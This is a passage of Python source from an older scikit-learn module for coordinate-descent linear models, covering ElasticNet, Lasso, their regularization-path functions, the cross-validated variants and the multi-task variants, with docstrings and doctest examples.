When set to ``True``, reuse the solution of the previous call to fit as
initialization, otherwise, just erase the previous solution.
positive: bool, optional
When set to ``True``, forces the coefficients to be positive.
Attributes
----------
``coef_`` : array, shape = (n_features,) | (n_targets, n_features)
parameter vector (w in the cost function formula)
``sparse_coef_`` : scipy.sparse matrix, shape = (n_features, 1) | \
(n_targets, n_features)
``sparse_coef_`` is a readonly property derived from ``coef_``
``intercept_`` : float | array, shape = (n_targets,)
independent term in decision function.
``dual_gap_`` : float | array, shape = (n_targets,)
the current fit is guaranteed to be epsilon-suboptimal with
epsilon := ``dual_gap_``
``eps_`` : float | array, shape = (n_targets,)
``eps_`` is used to check if the fit converged to the requested
``tol``
Notes
-----
To avoid unnecessary memory duplication the X argument of the fit method
should be directly passed as a Fortran-contiguous numpy array.
"""
def __init__(self, alpha=1.0, l1_ratio=0.5, fit_intercept=True,
normalize=False, precompute='auto', max_iter=1000,
copy_X=True, tol=1e-4, warm_start=False, positive=False,
rho=None):
self.alpha = alpha
self.l1_ratio = l1_ratio
if rho is not None:
self.l1_ratio = rho
warnings.warn("rho was renamed to l1_ratio and will be removed "
"in 0.15", DeprecationWarning)
self.coef_ = None
self.fit_intercept = fit_intercept
self.normalize = normalize
self.precompute = precompute
self.max_iter = max_iter
self.copy_X = copy_X
self.tol = tol
self.warm_start = warm_start
self.positive = positive
self.intercept_ = 0.0
def fit(self, X, y, Xy=None, coef_init=None):
"""Fit model with coordinate descent
Parameters
-----------
X: ndarray or scipy.sparse matrix, (n_samples, n_features)
Data
y: ndarray, shape = (n_samples,) or (n_samples, n_targets)
Target
Xy : array-like, optional
Xy = np.dot(X.T, y) that can be precomputed. It is useful
only when the Gram matrix is precomputed.
coef_init: ndarray of shape n_features or (n_targets, n_features)
The initial coeffients to warm-start the optimization
Notes
-----
Coordinate descent is an algorithm that considers each column of
data at a time hence it will automatically convert the X input
as a Fortran-contiguous numpy array if necessary.
To avoid memory re-allocation it is advised to allocate the
initial data in memory directly using that format.
"""
if self.alpha == 0:
warnings.warn("With alpha=0, this algorithm does not converge "
"well. You are advised to use the LinearRegression "
"estimator", stacklevel=2)
X = atleast2d_or_csc(X, dtype=np.float64, order='F',
copy=self.copy_X and self.fit_intercept)
# From now on X can be touched inplace
y = np.asarray(y, dtype=np.float64)
# now all computation with X can be done inplace
fit = self._sparse_fit if sparse.isspmatrix(X) else self._dense_fit
fit(X, y, Xy, coef_init)
return self
def _dense_fit(self, X, y, Xy=None, coef_init=None):
# copy was done in fit if necessary
X, y, X_mean, y_mean, X_std = center_data(
X, y, self.fit_intercept, self.normalize, copy=False)
if y.ndim == 1:
y = y[:, np.newaxis]
if Xy is not None and Xy.ndim == 1:
Xy = Xy[:, np.newaxis]
n_samples, n_features = X.shape
n_targets = y.shape[1]
precompute = self.precompute
if hasattr(precompute, '__array__') \
and not np.allclose(X_mean, np.zeros(n_features)) \
and not np.allclose(X_std, np.ones(n_features)):
# recompute Gram
precompute = 'auto'
Xy = None
coef_ = self._init_coef(coef_init, n_features, n_targets)
dual_gap_ = np.empty(n_targets)
eps_ = np.empty(n_targets)
l1_reg = self.alpha * self.l1_ratio * n_samples
l2_reg = self.alpha * (1.0 - self.l1_ratio) * n_samples
# precompute if n_samples > n_features
if precompute == "auto" and n_samples > n_features:
precompute = True
if hasattr(precompute, '__array__'):
Gram = precompute
elif precompute:
Gram = np.dot(X.T, X)
else:
Gram = None
for k in xrange(n_targets):
if Gram is None:
coef_[k, :], dual_gap_[k], eps_[k] = \
cd_fast.enet_coordinate_descent(
coef_[k, :], l1_reg, l2_reg, X, y[:, k], self.max_iter,
self.tol, self.positive)
else:
Gram = Gram.copy()
if Xy is None:
this_Xy = np.dot(X.T, y[:, k])
else:
this_Xy = Xy[:, k]
coef_[k, :], dual_gap_[k], eps_[k] = \
cd_fast.enet_coordinate_descent_gram(
coef_[k, :], l1_reg, l2_reg, Gram, this_Xy, y[:, k],
self.max_iter, self.tol, self.positive)
if dual_gap_[k] > eps_[k]:
warnings.warn('Objective did not converge for ' +
'target %d, you might want' % k +
' to increase the number of iterations')
self.coef_, self.dual_gap_, self.eps_ = (np.squeeze(a) for a in
(coef_, dual_gap_, eps_))
self._set_intercept(X_mean, y_mean, X_std)
# return self for chaining fit and predict calls
return self
def _sparse_fit(self, X, y, Xy=None, coef_init=None):
if X.shape[0] != y.shape[0]:
raise ValueError("X and y have incompatible shapes.\n" +
"Note: Sparse matrices cannot be indexed w/" +
"boolean masks (use `indices=True` in CV).")
# NOTE: we are explicitly not centering the data the naive way to
# avoid breaking the sparsity of X
X_data, y, X_mean, y_mean, X_std = sparse_center_data(
X, y, self.fit_intercept, self.normalize)
if y.ndim == 1:
y = y[:, np.newaxis]
n_samples, n_features = X.shape[0], X.shape[1]
n_targets = y.shape[1]
coef_ = self._init_coef(coef_init, n_features, n_targets)
dual_gap_ = np.empty(n_targets)
eps_ = np.empty(n_targets)
l1_reg = self.alpha * self.l1_ratio * n_samples
l2_reg = self.alpha * (1.0 - self.l1_ratio) * n_samples
for k in xrange(n_targets):
coef_[k, :], dual_gap_[k], eps_[k] = \
cd_fast.sparse_enet_coordinate_descent(
coef_[k, :], l1_reg, l2_reg, X_data, X.indices,
X.indptr, y[:, k], X_mean / X_std,
self.max_iter, self.tol, self.positive)
if dual_gap_[k] > eps_[k]:
warnings.warn('Objective did not converge for ' +
'target %d, you might want' % k +
' to increase the number of iterations')
self.coef_, self.dual_gap_, self.eps_ = (np.squeeze(a) for a in
(coef_, dual_gap_, eps_))
self._set_intercept(X_mean, y_mean, X_std)
# return self for chaining fit and predict calls
return self
def _init_coef(self, coef_init, n_features, n_targets):
if coef_init is None:
if not self.warm_start or self.coef_ is None:
coef_ = np.zeros((n_targets, n_features), dtype=np.float64)
else:
coef_ = self.coef_
else:
coef_ = coef_init
if coef_.ndim == 1:
coef_ = coef_[np.newaxis, :]
if coef_.shape != (n_targets, n_features):
raise ValueError("X and coef_init have incompatible "
"shapes (%s != %s)."
% (coef_.shape, (n_targets, n_features)))
return coef_
@property
def sparse_coef_(self):
""" sparse representation of the fitted coef """
return sparse.csr_matrix(self.coef_)
def decision_function(self, X):
"""Decision function of the linear model
Parameters
----------
X : numpy array or scipy.sparse matrix of shape (n_samples, n_features)
Returns
-------
T : array, shape = (n_samples,)
The predicted decision function
"""
if sparse.isspmatrix(X):
return np.ravel(safe_sparse_dot(self.coef_, X.T, dense_output=True)
+ self.intercept_)
else:
return super(ElasticNet, self).decision_function(X)
###############################################################################
# Lasso model
class Lasso(ElasticNet):
"""Linear Model trained with L1 prior as regularizer (aka the Lasso)
The optimization objective for Lasso is::
(1 / (2 * n_samples)) * ||y - Xw||^2_2 + alpha * ||w||_1
Technically the Lasso model is optimizing the same objective function as
the Elastic Net with ``l1_ratio=1.0`` (no L2 penalty).
Parameters
----------
alpha : float, optional
Constant that multiplies the L1 term. Defaults to 1.0.
``alpha = 0`` is equivalent to an ordinary least square, solved
by the :class:`LinearRegression` object. For numerical
reasons, using ``alpha = 0`` is with the Lasso object is not advised
and you should prefer the LinearRegression object.
fit_intercept : boolean
whether to calculate the intercept for this model. If set
to false, no intercept will be used in calculations
(e.g. data is expected to be already centered).
normalize : boolean, optional, default False
If ``True``, the regressors X will be normalized before regression.
copy_X : boolean, optional, default True
If ``True``, X will be copied; else, it may be overwritten.
precompute : True | False | 'auto' | array-like
Whether to use a precomputed Gram matrix to speed up
calculations. If set to ``'auto'`` let us decide. The Gram
matrix can also be passed as argument. For sparse input
this option is always ``True`` to preserve sparsity.
max_iter: int, optional
The maximum number of iterations
tol : float, optional
The tolerance for the optimization: if the updates are
smaller than ``tol``, the optimization code checks the
dual gap for optimality and continues until it is smaller
than ``tol``.
warm_start : bool, optional
When set to True, reuse the solution of the previous call to fit as
initialization, otherwise, just erase the previous solution.
positive : bool, optional
When set to ``True``, forces the coefficients to be positive.
Attributes
----------
``coef_`` : array, shape = (n_features,) | (n_targets, n_features)
parameter vector (w in the cost function formula)
``sparse_coef_`` : scipy.sparse matrix, shape = (n_features, 1) | \
(n_targets, n_features)
``sparse_coef_`` is a readonly property derived from ``coef_``
``intercept_`` : float | array, shape = (n_targets,)
independent term in decision function.
``dual_gap_`` : float | array, shape = (n_targets,)
the current fit is guaranteed to be epsilon-suboptimal with
epsilon := ``dual_gap_``
``eps_`` : float | array, shape = (n_targets,)
``eps_`` is used to check if the fit converged to the requested
``tol``
Examples
--------
>>> from sklearn import linear_model
>>> clf = linear_model.Lasso(alpha=0.1)
>>> clf.fit([[0,0], [1, 1], [2, 2]], [0, 1, 2])
Lasso(alpha=0.1, copy_X=True, fit_intercept=True, max_iter=1000,
normalize=False, positive=False, precompute='auto', tol=0.0001,
warm_start=False)
>>> print(clf.coef_)
[ 0.85 0. ]
>>> print(clf.intercept_)
0.15
See also
--------
lars_path
lasso_path
LassoLars
LassoCV
LassoLarsCV
sklearn.decomposition.sparse_encode
Notes
-----
The algorithm used to fit the model is coordinate descent.
To avoid unnecessary memory duplication the X argument of the fit method
should be directly passed as a Fortran-contiguous numpy array.
"""
def __init__(self, alpha=1.0, fit_intercept=True, normalize=False,
precompute='auto', copy_X=True, max_iter=1000,
tol=1e-4, warm_start=False, positive=False):
super(Lasso, self).__init__(
alpha=alpha, l1_ratio=1.0, fit_intercept=fit_intercept,
normalize=normalize, precompute=precompute, copy_X=copy_X,
max_iter=max_iter, tol=tol, warm_start=warm_start,
positive=positive)
###############################################################################
# Classes to store linear models along a regularization path
def lasso_path(X, y, eps=1e-3, n_alphas=100, alphas=None,
precompute='auto', Xy=None, fit_intercept=True,
normalize=False, copy_X=True, verbose=False,
**params):
"""Compute Lasso path with coordinate descent
The optimization objective for Lasso is::
(1 / (2 * n_samples)) * ||y - Xw||^2_2 + alpha * ||w||_1
Parameters
----------
X : ndarray, shape = (n_samples, n_features)
Training data. Pass directly as Fortran-contiguous data to avoid
unnecessary memory duplication
y : ndarray, shape = (n_samples,)
Target values
eps : float, optional
Length of the path. ``eps=1e-3`` means that
``alpha_min / alpha_max = 1e-3``
n_alphas : int, optional
Number of alphas along the regularization path
alphas : ndarray, optional
List of alphas where to compute the models.
If ``None`` alphas are set automatically
precompute : True | False | 'auto' | array-like
Whether to use a precomputed Gram matrix to speed up
calculations. If set to ``'auto'`` let us decide. The Gram
matrix can also be passed as argument.
Xy : array-like, optional
Xy = np.dot(X.T, y) that can be precomputed. It is useful
only when the Gram matrix is precomputed.
fit_intercept : bool
Fit or not an intercept
normalize : boolean, optional, default False
If ``True``, the regressors X will be normalized before regression.
copy_X : boolean, optional, default True
If ``True``, X will be copied; else, it may be overwritten.
verbose : bool or integer
Amount of verbosity
params : kwargs
keyword arguments passed to the Lasso objects
Returns
-------
models : a list of models along the regularization path
Notes
-----
See examples/linear_model/plot_lasso_coordinate_descent_path.py
for an example.
To avoid unnecessary memory duplication the X argument of the fit method
should be directly passed as a Fortran-contiguous numpy array.
Note that in certain cases, the Lars solver may be significantly
faster to implement this functionality. In particular, linear
interpolation can be used to retrieve model coefficents between the
values output by lars_path
Examples
---------
Comparing lasso_path and lars_path with interpolation:
>>> X = np.array([[1, 2, 3.1], [2.3, 5.4, 4.3]]).T
>>> y = np.array([1, 2, 3.1])
>>> # Use lasso_path to compute a coefficient path
>>> coef_path = [e.coef_ for e in lasso_path(X, y, alphas=[5., 1., .5], fit_intercept=False)]
>>> print(np.array(coef_path).T)
[[ 0. 0. 0.46874778]
[ 0.2159048 0.4425765 0.23689075]]
>>> # Now use lars_path and 1D linear interpolation to compute the
>>> # same path
>>> from sklearn.linear_model import lars_path
>>> alphas, active, coef_path_lars = lars_path(X, y, method='lasso')
>>> from scipy import interpolate
>>> coef_path_continuous = interpolate.interp1d(alphas[::-1], coef_path_lars[:, ::-1])
>>> print(coef_path_continuous([5., 1., .5]))
[[ 0. 0. 0.46915237]
[ 0.2159048 0.4425765 0.23668876]]
See also
--------
lars_path
Lasso
LassoLars
LassoCV
LassoLarsCV
sklearn.decomposition.sparse_encode
"""
return enet_path(X, y, l1_ratio=1., eps=eps, n_alphas=n_alphas,
alphas=alphas, precompute=precompute, Xy=Xy,
fit_intercept=fit_intercept, normalize=normalize,
copy_X=copy_X, verbose=verbose, **params)
def enet_path(X, y, l1_ratio=0.5, eps=1e-3, n_alphas=100, alphas=None,
precompute='auto', Xy=None, fit_intercept=True,
normalize=False, copy_X=True, verbose=False, rho=None,
**params):
"""Compute Elastic-Net path with coordinate descent
The Elastic Net optimization function is::
1 / (2 * n_samples) * ||y - Xw||^2_2 +
+ alpha * l1_ratio * ||w||_1
+ 0.5 * alpha * (1 - l1_ratio) * ||w||^2_2
Parameters
----------
X : ndarray, shape = (n_samples, n_features)
Training data. Pass directly as Fortran-contiguous data to avoid
unnecessary memory duplication
y : ndarray, shape = (n_samples,)
Target values
l1_ratio : float, optional
float between 0 and 1 passed to ElasticNet (scaling between
l1 and l2 penalties). ``l1_ratio=1`` corresponds to the Lasso
eps : float
Length of the path. ``eps=1e-3`` means that
``alpha_min / alpha_max = 1e-3``
n_alphas : int, optional
Number of alphas along the regularization path
alphas : ndarray, optional
List of alphas where to compute the models.
If None alphas are set automatically
precompute : True | False | 'auto' | array-like
Whether to use a precomputed Gram matrix to speed up
calculations. If set to ``'auto'`` let us decide. The Gram
matrix can also be passed as argument.
Xy : array-like, optional
Xy = np.dot(X.T, y) that can be precomputed. It is useful
only when the Gram matrix is precomputed.
fit_intercept : bool
Fit or not an intercept
normalize : boolean, optional, default False
If ``True``, the regressors X will be normalized before regression.
copy_X : boolean, optional, default True
If ``True``, X will be copied; else, it may be overwritten.
verbose : bool or integer
Amount of verbosity
params : kwargs
keyword arguments passed to the Lasso objects
Returns
-------
models : a list of models along the regularization path
Notes
-----
See examples/plot_lasso_coordinate_descent_path.py for an example.
See also
--------
ElasticNet
ElasticNetCV
"""
if rho is not None:
l1_ratio = rho
warnings.warn("rho was renamed to l1_ratio and will be removed "
"in 0.15", DeprecationWarning)
X = atleast2d_or_csc(X, dtype=np.float64, order='F',
copy=copy_X and fit_intercept)
# From now on X can be touched inplace
if not sparse.isspmatrix(X):
X, y, X_mean, y_mean, X_std = center_data(X, y, fit_intercept,
normalize, copy=False)
# XXX : in the sparse case the data will be centered
# at each fit...
n_samples, n_features = X.shape
if (hasattr(precompute, '__array__')
and not np.allclose(X_mean, np.zeros(n_features))
and not np.allclose(X_std, np.ones(n_features))):
# recompute Gram
precompute = 'auto'
Xy = None
if precompute or ((precompute == 'auto') and (n_samples > n_features)):
if sparse.isspmatrix(X):
warnings.warn("precompute is ignored for sparse data")
precompute = False
else:
precompute = np.dot(X.T, X)
if Xy is None:
Xy = safe_sparse_dot(X.T, y, dense_output=True)
n_samples = X.shape[0]
if alphas is None:
alpha_max = np.abs(Xy).max() / (n_samples * l1_ratio)
alphas = np.logspace(np.log10(alpha_max * eps), np.log10(alpha_max),
num=n_alphas)[::-1]
else:
alphas = np.sort(alphas)[::-1] # make sure alphas are properly ordered
coef_ = None # init coef_
models = []
n_alphas = len(alphas)
for i, alpha in enumerate(alphas):
model = ElasticNet(
alpha=alpha, l1_ratio=l1_ratio,
fit_intercept=fit_intercept if sparse.isspmatrix(X) else False,
precompute=precompute)
model.set_params(**params)
model.fit(X, y, coef_init=coef_, Xy=Xy)
if fit_intercept and not sparse.isspmatrix(X):
model.fit_intercept = True
model._set_intercept(X_mean, y_mean, X_std)
if verbose:
if verbose > 2:
print(model)
elif verbose > 1:
print('Path: %03i out of %03i' % (i, n_alphas))
else:
sys.stderr.write('.')
coef_ = model.coef_.copy()
models.append(model)
return models
def _path_residuals(X, y, train, test, path, path_params, l1_ratio=1):
this_mses = list()
if 'l1_ratio' in path_params:
path_params['l1_ratio'] = l1_ratio
models_train = path(X[train], y[train], **path_params)
this_mses = np.empty(len(models_train))
for i_model, model in enumerate(models_train):
y_ = model.predict(X[test])
this_mses[i_model] = ((y_ - y[test]) ** 2).mean()
return this_mses, l1_ratio
class LinearModelCV(LinearModel):
"""Base class for iterative model fitting along a regularization path"""
__metaclass__ = ABCMeta
@abstractmethod
def __init__(self, eps=1e-3, n_alphas=100, alphas=None, fit_intercept=True,
normalize=False, precompute='auto', max_iter=1000, tol=1e-4,
copy_X=True, cv=None, verbose=False):
self.eps = eps
self.n_alphas = n_alphas
self.alphas = alphas
self.fit_intercept = fit_intercept
self.normalize = normalize
self.precompute = precompute
self.max_iter = max_iter
self.tol = tol
self.copy_X = copy_X
self.cv = cv
self.verbose = verbose
def fit(self, X, y):
"""Fit linear model with coordinate descent
Fit is on grid of alphas and best alpha estimated by cross-validation.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Training data. Pass directly as Fortran-contiguous data to avoid
unnecessary memory duplication
y : narray, shape (n_samples,) or (n_samples, n_targets)
Target values
"""
X = atleast2d_or_csc(X, dtype=np.float64, order='F',
copy=self.copy_X and self.fit_intercept)
# From now on X can be touched inplace
y = np.asarray(y, dtype=np.float64)
if X.shape[0] != y.shape[0]:
raise ValueError("X and y have inconsistent dimensions (%d != %d)"
% (X.shape[0], y.shape[0]))
# All LinearModelCV parameters except 'cv' are acceptable
path_params = self.get_params()
if 'l1_ratio' in path_params:
l1_ratios = np.atleast_1d(path_params['l1_ratio'])
# For the first path, we need to set l1_ratio
path_params['l1_ratio'] = l1_ratios[0]
else:
l1_ratios = [1, ]
path_params.pop('cv', None)
path_params.pop('n_jobs', None)
# Start to compute path on full data
# XXX: is this really useful: we are fitting models that we won't
# use later
models = self.path(X, y, **path_params)
# Update the alphas list
alphas = [model.alpha for model in models]
n_alphas = len(alphas)
path_params.update({'alphas': alphas, 'n_alphas': n_alphas})
# init cross-validation generator
cv = check_cv(self.cv, X)
# Compute path for all folds and compute MSE to get the best alpha
folds = list(cv)
best_mse = np.inf
all_mse_paths = list()
# We do a double for loop folded in one, in order to be able to
# iterate in parallel on l1_ratio and folds
for l1_ratio, mse_alphas in itertools.groupby(
Parallel(n_jobs=self.n_jobs, verbose=self.verbose)(
delayed(_path_residuals)(
X, y, train, test, self.path, path_params,
l1_ratio=l1_ratio)
for l1_ratio in l1_ratios for train, test in folds
), operator.itemgetter(1)):
mse_alphas = [m[0] for m in mse_alphas]
mse_alphas = np.array(mse_alphas)
mse = np.mean(mse_alphas, axis=0)
i_best_alpha = np.argmin(mse)
this_best_mse = mse[i_best_alpha]
all_mse_paths.append(mse_alphas.T)
if this_best_mse < best_mse:
model = models[i_best_alpha]
best_l1_ratio = l1_ratio
if hasattr(model, 'l1_ratio'):
if model.l1_ratio != best_l1_ratio:
# Need to refit the model
model.l1_ratio = best_l1_ratio
model.fit(X, y)
self.l1_ratio_ = model.l1_ratio
self.coef_ = model.coef_
self.intercept_ = model.intercept_
self.alpha_ = model.alpha
self.alphas_ = np.asarray(alphas)
self.coef_path_ = np.asarray([model.coef_ for model in models])
self.mse_path_ = np.squeeze(all_mse_paths)
return self
@property
def rho_(self):
warnings.warn("rho was renamed to ``l1_ratio_`` and will be removed "
"in 0.15", DeprecationWarning)
return self.l1_ratio_
class LassoCV(LinearModelCV, RegressorMixin):
"""Lasso linear model with iterative fitting along a regularization path
The best model is selected by cross-validation.
The optimization objective for Lasso is::
(1 / (2 * n_samples)) * ||y - Xw||^2_2 + alpha * ||w||_1
Parameters
----------
eps : float, optional
Length of the path. ``eps=1e-3`` means that
``alpha_min / alpha_max = 1e-3``.
n_alphas : int, optional
Number of alphas along the regularization path
alphas : numpy array, optional
List of alphas where to compute the models.
If ``None`` alphas are set automatically
precompute : True | False | 'auto' | array-like
Whether to use a precomputed Gram matrix to speed up
calculations. If set to ``'auto'`` let us decide. The Gram
matrix can also be passed as argument.
max_iter: int, optional
The maximum number of iterations
tol: float, optional
The tolerance for the optimization: if the updates are
smaller than ``tol``, the optimization code checks the
dual gap for optimality and continues until it is smaller
than ``tol``.
cv : integer or crossvalidation generator, optional
If an integer is passed, it is the number of fold (default 3).
Specific crossvalidation objects can be passed, see the
:mod:`sklearn.cross_validation` module for the list of possible objects.
verbose : bool or integer
amount of verbosity
Attributes
----------
``alpha_`` : float
The amount of penalization choosen by cross validation
``coef_`` : array, shape = (n_features,) | (n_targets, n_features)
parameter vector (w in the cost function formula)
``intercept_`` : float | array, shape = (n_targets,)
independent term in decision function.
``mse_path_`` : array, shape = (n_alphas, n_folds)
mean square error for the test set on each fold, varying alpha
``alphas_`` : numpy array
The grid of alphas used for fitting
Notes
-----
See examples/linear_model/lasso_path_with_crossvalidation.py
for an example.
To avoid unnecessary memory duplication the X argument of the fit method
should be directly passed as a Fortran-contiguous numpy array.
See also
--------
lars_path
lasso_path
LassoLars
Lasso
LassoLarsCV
"""
path = staticmethod(lasso_path)
n_jobs = 1
def __init__(self, eps=1e-3, n_alphas=100, alphas=None, fit_intercept=True,
normalize=False, precompute='auto', max_iter=1000, tol=1e-4,
copy_X=True, cv=None, verbose=False):
super(LassoCV, self).__init__(
eps=eps, n_alphas=n_alphas, alphas=alphas,
fit_intercept=fit_intercept, normalize=normalize,
precompute=precompute, max_iter=max_iter, tol=tol, copy_X=copy_X,
cv=cv, verbose=verbose)
class ElasticNetCV(LinearModelCV, RegressorMixin):
"""Elastic Net model with iterative fitting along a regularization path
The best model is selected by cross-validation.
Parameters
----------
l1_ratio : float, optional
float between 0 and 1 passed to ElasticNet (scaling between
l1 and l2 penalties). For ``l1_ratio = 0``
the penalty is an L2 penalty. For ``l1_ratio = 1`` it is an L1 penalty.
For ``0 < l1_ratio < 1``, the penalty is a combination of L1 and L2
This parameter can be a list, in which case the different
values are tested by cross-validation and the one giving the best
prediction score is used. Note that a good choice of list of
values for l1_ratio is often to put more values close to 1
(i.e. Lasso) and less close to 0 (i.e. Ridge), as in ``[.1, .5, .7,
.9, .95, .99, 1]``
eps : float, optional
Length of the path. ``eps=1e-3`` means that
``alpha_min / alpha_max = 1e-3``.
n_alphas : int, optional
Number of alphas along the regularization path
alphas : numpy array, optional
List of alphas where to compute the models.
If None alphas are set automatically
precompute : True | False | 'auto' | array-like
Whether to use a precomputed Gram matrix to speed up
calculations. If set to ``'auto'`` let us decide. The Gram
matrix can also be passed as argument.
max_iter : int, optional
The maximum number of iterations
tol : float, optional
The tolerance for the optimization: if the updates are
smaller than ``tol``, the optimization code checks the
dual gap for optimality and continues until it is smaller
than ``tol``.
cv : integer or crossvalidation generator, optional
If an integer is passed, it is the number of fold (default 3).
Specific crossvalidation objects can be passed, see the
:mod:`sklearn.cross_validation` module for the list of possible objects.
verbose : bool or integer
amount of verbosity
n_jobs : integer, optional
Number of CPUs to use during the cross validation. If ``-1``, use
all the CPUs. Note that this is used only if multiple values for
l1_ratio are given.
Attributes
----------
``alpha_`` : float
The amount of penalization choosen by cross validation
``l1_ratio_`` : float
The compromise between l1 and l2 penalization choosen by
cross validation
``coef_`` : array, shape = (n_features,) | (n_targets, n_features)
Parameter vector (w in the cost function formula),
``intercept_`` : float | array, shape = (n_targets, n_features)
Independent term in the decision function.
``mse_path_`` : array, shape = (n_l1_ratio, n_alpha, n_folds)
Mean square error for the test set on each fold, varying l1_ratio and
alpha.
Notes
-----
See examples/linear_model/lasso_path_with_crossvalidation.py
for an example.
To avoid unnecessary memory duplication the X argument of the fit method
should be directly passed as a Fortran-contiguous numpy array.
The parameter l1_ratio corresponds to alpha in the glmnet R package
while alpha corresponds to the lambda parameter in glmnet.
More specifically, the optimization objective is::
1 / (2 * n_samples) * ||y - Xw||^2_2 +
+ alpha * l1_ratio * ||w||_1
+ 0.5 * alpha * (1 - l1_ratio) * ||w||^2_2
If you are interested in controlling the L1 and L2 penalty
separately, keep in mind that this is equivalent to::
a * L1 + b * L2
for::
alpha = a + b and l1_ratio = a / (a + b).
See also
--------
enet_path
ElasticNet
"""
path = staticmethod(enet_path)
def __init__(self, l1_ratio=0.5, eps=1e-3, n_alphas=100, alphas=None,
fit_intercept=True, normalize=False, precompute='auto',
max_iter=1000, tol=1e-4, cv=None, copy_X=True,
verbose=0, n_jobs=1, rho=None):
self.l1_ratio = l1_ratio
if rho is not None:
self.l1_ratio = rho
warnings.warn("rho was renamed to l1_ratio and will be removed "
"in 0.15", DeprecationWarning)
self.eps = eps
self.n_alphas = n_alphas
self.alphas = alphas
self.fit_intercept = fit_intercept
self.normalize = normalize
self.precompute = precompute
self.max_iter = max_iter
self.tol = tol
self.cv = cv
self.copy_X = copy_X
self.verbose = verbose
self.n_jobs = n_jobs
@property
@deprecated("rho was renamed to ``l1_ratio_`` and will be removed "
"in 0.15")
def rho(self):
return self.l1_ratio_
###############################################################################
# Multi Task ElasticNet and Lasso models (with joint feature selection)
class MultiTaskElasticNet(Lasso):
"""Multi-task ElasticNet model trained with L1/L2 mixed-norm as regularizer
The optimization objective for Lasso is::
(1 / (2 * n_samples)) * ||Y - XW||^Fro_2
+ alpha * l1_ratio * ||W||_21
+ 0.5 * alpha * (1 - l1_ratio) * ||W||_Fro^2
Where::
||W||_21 = \sum_i \sqrt{\sum_j w_{ij}^2}
i.e. the sum of norm of earch row.
Parameters
----------
alpha : float, optional
Constant that multiplies the L1/L2 term. Defaults to 1.0
l1_ratio : float
The ElasticNet mixing parameter, with 0 < l1_ratio <= 1.
For l1_ratio = 0 the penalty is an L1/L2 penalty. For l1_ratio = 1 it
is an L1 penalty.
For ``0 < l1_ratio < 1``, the penalty is a combination of L1/L2 and L2.
fit_intercept : boolean
whether to calculate the intercept for this model. If set
to false, no intercept will be used in calculations
(e.g. data is expected to be already centered).
normalize : boolean, optional, default False
If ``True``, the regressors X will be normalized before regression.
copy_X : boolean, optional, default True
If ``True``, X will be copied; else, it may be overwritten.
max_iter : int, optional
The maximum number of iterations
tol : float, optional
The tolerance for the optimization: if the updates are
smaller than ``tol``, the optimization code checks the
dual gap for optimality and continues until it is smaller
than ``tol``.
warm_start : bool, optional
When set to ``True``, reuse the solution of the previous call to fit as
initialization, otherwise, just erase the previous solution.
Attributes
----------
``intercept_`` : array, shape = (n_tasks,)
Independent term in decision function.
``coef_`` : array, shape = (n_tasks, n_features)
Parameter vector (W in the cost function formula). If a 1D y is \
passed in at fit (non multi-task usage), ``coef_`` is then a 1D array
Examples
--------
>>> from sklearn import linear_model
>>> clf = linear_model.MultiTaskElasticNet(alpha=0.1)
>>> clf.fit([[0,0], [1, 1], [2, 2]], [[0, 0], [1, 1], [2, 2]])
... #doctest: +NORMALIZE_WHITESPACE
MultiTaskElasticNet(alpha=0.1, copy_X=True, fit_intercept=True,
l1_ratio=0.5, max_iter=1000, normalize=False, rho=None, tol=0.0001,
warm_start=False)
>>> print(clf.coef_)
[[ 0.45663524 0.45612256]
[ 0.45663524 0.45612256]]
>>> print(clf.intercept_)
[ 0.0872422 0.0872422]
See also
--------
ElasticNet, MultiTaskLasso
Notes
-----
The algorithm used to fit the model is coordinate descent.
To avoid unnecessary memory duplication the X argument of the fit method
should be directly passed as a Fortran-contiguous numpy array.
"""
def __init__(self, alpha=1.0, l1_ratio=0.5, fit_intercept=True,
normalize=False, copy_X=True, max_iter=1000, tol=1e-4,
warm_start=False, rho=None):
self.l1_ratio = l1_ratio
if rho is not None:
self.l1_ratio = rho
warnings.warn("rho was renamed to l1_ratio and will be removed "
"in 0.15", DeprecationWarning)
self.alpha = alpha
self.coef_ = None
self.fit_intercept = fit_intercept
self.normalize = normalize
self.max_iter = max_iter
self.copy_X = copy_X
self.tol = tol
self.warm_start = warm_start
def fit(self, X, y, Xy=None, coef_init=None):
"""Fit MultiTaskLasso model with coordinate descent
Parameters
-----------
X: ndarray, shape = (n_samples, n_features)
Data
y: ndarray, shape = (n_samples, n_tasks)
Target
coef_init: ndarray of shape n_features
The initial coeffients to warm-start the optimization
Notes
-----
Coordinate descent is an algorithm that considers each column of
data at a time hence it will automatically convert the X input
as a Fortran-contiguous numpy array if necessary.
To avoid memory re-allocation it is advised to allocate the
initial data in memory directly using that format.
"""
# X and y must be of type float64
X = array2d(X, dtype=np.float64, order='F',
copy=self.copy_X and self.fit_intercept)
y = np.asarray(y, dtype=np.float64)
squeeze_me = False
if y.ndim == 1:
squeeze_me = True
y = y[:, np.newaxis]
n_samples, n_features = X.shape
_, n_tasks = y.shape
X, y, X_mean, y_mean, X_std = center_data(
X, y, self.fit_intercept, self.normalize, copy=False)
if coef_init is None:
if not self.warm_start or self.coef_ is None:
self.coef_ = np.zeros((n_tasks, n_features), dtype=np.float64,
order='F')
else:
self.coef_ = coef_init
l1_reg = self.alpha * self.l1_ratio * n_samples
l2_reg = self.alpha * (1.0 - self.l1_ratio) * n_samples
self.coef_ = np.asfortranarray(self.coef_) # coef contiguous in memory
self.coef_, self.dual_gap_, self.eps_ = \
cd_fast.enet_coordinate_descent_multi_task(
self.coef_, l1_reg, l2_reg, X, y, self.max_iter, self.tol)
self._set_intercept(X_mean, y_mean, X_std)
# Make sure that the coef_ have the same shape as the given 'y',
# to predict with the same shape
if squeeze_me:
self.coef_ = self.coef_.squeeze()
if self.dual_gap_ > self.eps_:
warnings.warn('Objective did not converge, you might want'
' to increase the number of iterations')
# return self for chaining fit and predict calls
return self
class MultiTaskLasso(MultiTaskElasticNet):
"""Multi-task Lasso model trained with L1/L2 mixed-norm as regularizer
The optimization objective for Lasso is::
(1 / (2 * n_samples)) * ||Y - XW||^2_Fro + alpha * ||W||_21
Where::
||W||_21 = \sum_i \sqrt{\sum_j w_{ij}^2}
i.e. the sum of norm of earch row.
Parameters
----------
alpha : float, optional
Constant that multiplies the L1/L2 term. Defaults to 1.0
fit_intercept : boolean
whether to calculate the intercept for this model. If set
to false, no intercept will be used in calculations
(e.g. data is expected to be already centered).
normalize : boolean, optional, default False
If ``True``, the regressors X will be normalized before regression.
copy_X : boolean, optional, default True
If ``True``, X will be copied; else, it may be overwritten.
